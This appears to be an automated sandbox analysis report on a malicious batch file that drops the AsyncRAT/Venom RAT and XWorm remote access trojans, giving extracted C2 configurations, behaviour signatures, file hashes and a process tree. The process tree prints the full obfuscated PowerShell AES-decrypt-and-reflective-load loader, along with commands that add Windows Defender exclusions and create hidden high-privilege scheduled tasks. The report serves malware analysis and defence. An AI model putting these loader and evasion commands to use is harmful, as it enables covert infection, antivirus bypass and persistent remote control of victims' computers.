Overview

overview

10

Static

static

1

planet x v5.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    141s
  • max time network
    97s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240419-en
  • resource tags

    arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    29-05-2024 14:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    planet x v5.bat

  • Size

    448KB

  • MD5

    8c4ca851ec8c215035857784815134d2

  • SHA1

    2a0bf3160c0bc0979b27b241a5bc9fd13069ab2f

  • SHA256

    c97c51a6260a694daabe26dd47d5bc4304ad24e0e5e49fd906a13e99f3931734

  • SHA512

    9c6765ea2fa3c14d29c441bf07e3fcac4ade33e996a4926e0c42a4b22906434721e3be5b7267b5a2e83a09ad68f552f9c9823a47f477928b6168bda1e8f6e7d9

  • SSDEEP

    6144:21m/ysEZubRskU36lHu1BpVtPEeL2oUmH5lpr4qUA4sVzlSUb57+qd7dhoRWk9i+:249PbRq3I4BpDE9onlBpfVga5PdJWg+

Score
10/10
asyncratxwormdefaultexecutionpersistencerattrojan

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

127.0.0.1:38173

Mutex

epykvfetbqzwboxh

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

xworm

C2

19.ip.gl.ply.gg:38173

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    Runtime Broker.exe

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Async RAT payload 1 IoCs
    rat
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 43 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\planet x v5.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:836
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3xOzG4jhhkcaXQQK8UNuUswDOtFpNkDEDd4fSd1w7qk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t90Jt5EglVd/UHOjjuP4kg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cMVRk=New-Object System.IO.MemoryStream(,$param_var); $dwXmc=New-Object System.IO.MemoryStream; $BjMRe=New-Object System.IO.Compression.GZipStream($cMVRk, [IO.Compression.CompressionMode]::Decompress); $BjMRe.CopyTo($dwXmc); $BjMRe.Dispose(); $cMVRk.Dispose(); $dwXmc.Dispose(); $dwXmc.ToArray();}function execute_function($param_var,$param2_var){ $fNKgh=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $pSDnv=$fNKgh.EntryPoint; $pSDnv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\planet x v5.bat';$FmcDj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\planet x v5.bat').Split([Environment]::NewLine);foreach ($choRp in $FmcDj) { if ($choRp.StartsWith(':: ')) { $DqwHc=$choRp.Substring(3); break; }}$payloads_var=[string[]]$DqwHc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1212
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_997_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_997.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2772
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_997.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:484
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_997.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1952
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3xOzG4jhhkcaXQQK8UNuUswDOtFpNkDEDd4fSd1w7qk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t90Jt5EglVd/UHOjjuP4kg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cMVRk=New-Object System.IO.MemoryStream(,$param_var); $dwXmc=New-Object System.IO.MemoryStream; $BjMRe=New-Object System.IO.Compression.GZipStream($cMVRk, [IO.Compression.CompressionMode]::Decompress); $BjMRe.CopyTo($dwXmc); $BjMRe.Dispose(); $cMVRk.Dispose(); $dwXmc.Dispose(); $dwXmc.ToArray();}function execute_function($param_var,$param2_var){ $fNKgh=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $pSDnv=$fNKgh.EntryPoint; $pSDnv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_997.bat';$FmcDj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_997.bat').Split([Environment]::NewLine);foreach ($choRp in $FmcDj) { if ($choRp.StartsWith(':: ')) { $DqwHc=$choRp.Substring(3); break; }}$payloads_var=[string[]]$DqwHc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2128
            • C:\Users\Admin\AppData\Roaming\Client.exe
              "C:\Users\Admin\AppData\Roaming\Client.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of SetWindowsHookEx
              PID:4924
            • C:\Users\Admin\AppData\Roaming\XClient.exe
              "C:\Users\Admin\AppData\Roaming\XClient.exe"
              6⤵
              • Drops startup file
              • Executes dropped EXE
              • Loads dropped DLL
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:2568
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:3604
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:2724
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Runtime Broker.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:4072
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:1604
              • C:\Windows\System32\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Admin\Runtime Broker.exe"
                7⤵
                • Creates scheduled task(s)
                PID:4640
              • C:\Windows\SYSTEM32\CMD.EXE
                "CMD.EXE"
                7⤵
                  PID:4068
                • C:\Windows\System32\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /delete /f /tn "Runtime Broker"
                  7⤵
                    PID:2604
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp8F1D.tmp.bat""
                    7⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2228
                    • C:\Windows\system32\timeout.exe
                      timeout 3
                      8⤵
                      • Delays execution with timeout.exe
                      PID:1708
      • C:\Users\Admin\Runtime Broker.exe
        "C:\Users\Admin\Runtime Broker.exe"
        1⤵
        • Executes dropped EXE
        PID:3448

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        3KB

        MD5

        df472dcddb36aa24247f8c8d8a517bd7

        SHA1

        6f54967355e507294cbc86662a6fbeedac9d7030

        SHA256

        e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

        SHA512

        06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        1a02a5c33811019844be6fbe448ece23

        SHA1

        4dece1ff369ddb3c43fdf35eb4459e7e8f98aa53

        SHA256

        211bee57548752f13c37e7aa4d98b2e61f41b922c28ad0fe4559f3947985e67b

        SHA512

        d1217dcd8c8d30299ad95afb424c5609bb462e1f21d0445d849466a78b97990de7ad3fe77cf0e4b039ab6c5f9ebfefe40d2c1a83eb437af8c8098ac9d7488d0a

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        0b59f3fa12628f63b5713c4833570d7f

        SHA1

        badcf18f1fdc94b1eadf63f27c09ad092c4a6ccb

        SHA256

        2332e52881483559d787508831c00192c4f0a4fedc232b0309e566a30247af1d

        SHA512

        01724fd9f7a20ec5ff3d2686593d5d95069135834e9b156ced36985067fb36e7b3ec2a0018e41fa125ad5d1e42c80be9e148632a9b655f2d41c1400a4320abe7

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        eb15ee5741b379245ca8549cb0d4ecf8

        SHA1

        3555273945abda3402674aea7a4bff65eb71a783

        SHA256

        b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636

        SHA512

        1f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        12b69b5aa3b65136b7baf6b9adb56208

        SHA1

        0d05db9469da423799d92ad04fbe690f3533ef84

        SHA256

        890619ee616c917ec73c077ae2852813908f46c24ab63d7f498b514463fa1533

        SHA512

        ba78f4c18ca63f52e9d789059eece05ae4812091df031d001d267a16e306338bf3881af46908517f3e3f02ed907df91dee072bf0042cd4edd8d689d048f29a0d

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        05b3cd21c1ec02f04caba773186ee8d0

        SHA1

        39e790bfe10abf55b74dfb3603df8fcf6b5e6edb

        SHA256

        911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8

        SHA512

        e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xkzwhzmi.0y4.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\tmp8F1D.tmp.bat
        Filesize

        156B

        MD5

        b3082feb212afe3326aa35520125f956

        SHA1

        822c3d39055f7f9edb9d17463f37f06fcc182c2e

        SHA256

        6f55b24e205db1f53191f2871a10b01f61deee5c96d05875c09c9f75ad9c4f4f

        SHA512

        8469769ff47c950b174ef1bcd5315820f32f35a686021bb837785f2833edce7048efe4822da30ff2defd93ed6b3d1a639747cf150031c36f5016285d59cbc7a7

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\tmpE119.tmp
        Filesize

        100KB

        MD5

        1b942faa8e8b1008a8c3c1004ba57349

        SHA1

        cd99977f6c1819b12b33240b784ca816dfe2cb91

        SHA256

        555ccb7ecd9ae52a75135fdd81ab443a49d5785b0621ed6468d28c4234e46ccc

        SHA512

        5aee3d59478d41ddd5885c99b394c9c4983064e2b3528db1a3f7fc289662bced4f57d072517bbe7573c6d1789435e987ef1aa9cc91f372bcfd30bc016675fa43

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Client.exe
        Filesize

        74KB

        MD5

        f8ec02f0ad41f3e984037b398641f3bb

        SHA1

        88d64ad9840e65bcd5d27323a0fe2214d00d7346

        SHA256

        12cdd3df8d582bc30a49c2b4f8cf96d522e0f01d64f2e7df17276dc89fdb1a75

        SHA512

        31d177cceba0a3698f696c5daa0265ebe3fecf8a2a2934290e574789811a68c7313c1b0b40b1bae88666088c87fc9336941e10f26952a442c9cc3ca9637f5322

        Download Submit

      • C:\Users\Admin\AppData\Roaming\XClient.exe
        Filesize

        75KB

        MD5

        74fcef65a288af74b2a36dd6895264f8

        SHA1

        d5d73bb877f0aee6962f49c87603eec9d5b4846b

        SHA256

        ed308d6d8768d98145916f4529e0b444058105f401acf1e01bdacadf39a637b1

        SHA512

        c342445070326c126ae5841cc88a3cdcd2ae6bd995a37903ca6cacb517dc3ed7ada4c9fb7c020ad814824d2a5a29fd909da895c40475aec5ec6499778e25772a

        Download Submit

      • C:\Users\Admin\AppData\Roaming\startup_str_997.bat
        Filesize

        448KB

        MD5

        8c4ca851ec8c215035857784815134d2

        SHA1

        2a0bf3160c0bc0979b27b241a5bc9fd13069ab2f

        SHA256

        c97c51a6260a694daabe26dd47d5bc4304ad24e0e5e49fd906a13e99f3931734

        SHA512

        9c6765ea2fa3c14d29c441bf07e3fcac4ade33e996a4926e0c42a4b22906434721e3be5b7267b5a2e83a09ad68f552f9c9823a47f477928b6168bda1e8f6e7d9

        Download Submit

      • C:\Users\Admin\AppData\Roaming\startup_str_997.vbs
        Filesize

        115B

        MD5

        6c4c61637d5c5533d0beb769cde2113c

        SHA1

        b205bd82e753ce05acc2fb1b4f9479a99dece13c

        SHA256

        bd8d691b6e23df05755f7dc5d454f32822486171b21f63687419f2e4252974e3

        SHA512

        1a7e88298f02318eda89056115704f580342549f2ad4d266c9f018483b30ce96536572d64081032033f64913190356409bf9132e8be0af03316ab4cc35105b73

        Download Submit

      • memory/1212-120-0x00007FFDCB230000-0x00007FFDCBCF2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1212-13-0x0000016144FC0000-0x0000016144FC8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/1212-11-0x00007FFDCB230000-0x00007FFDCBCF2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1212-12-0x00007FFDCB230000-0x00007FFDCBCF2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1212-9-0x0000016144F70000-0x0000016144F92000-memory.dmp

        Filesize

        136KB

        Download

      • memory/1212-10-0x00007FFDCB230000-0x00007FFDCBCF2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1212-119-0x00007FFDCB233000-0x00007FFDCB235000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1212-0-0x00007FFDCB233000-0x00007FFDCB235000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1212-14-0x0000016144FD0000-0x0000016145026000-memory.dmp

        Filesize

        344KB

        Download

      • memory/2128-48-0x000001E254CC0000-0x000001E254CF0000-memory.dmp

        Filesize

        192KB

        Download

      • memory/2568-122-0x000000001CAF0000-0x000000001CB2A000-memory.dmp

        Filesize

        232KB

        Download

      • memory/2568-74-0x0000000000440000-0x000000000045A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/2568-121-0x000000001BC90000-0x000000001BC9C000-memory.dmp

        Filesize

        48KB

        Download

      • memory/2568-130-0x000000001C7A0000-0x000000001C7AE000-memory.dmp

        Filesize

        56KB

        Download

      • memory/2568-131-0x000000001C890000-0x000000001C89A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/2772-27-0x00007FFDCB230000-0x00007FFDCBCF2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2772-24-0x00007FFDCB230000-0x00007FFDCBCF2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2772-30-0x00007FFDCB230000-0x00007FFDCBCF2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2772-26-0x00007FFDCB230000-0x00007FFDCBCF2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2772-25-0x00007FFDCB230000-0x00007FFDCBCF2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4924-63-0x0000000000CF0000-0x0000000000D08000-memory.dmp

        Filesize

        96KB

        Download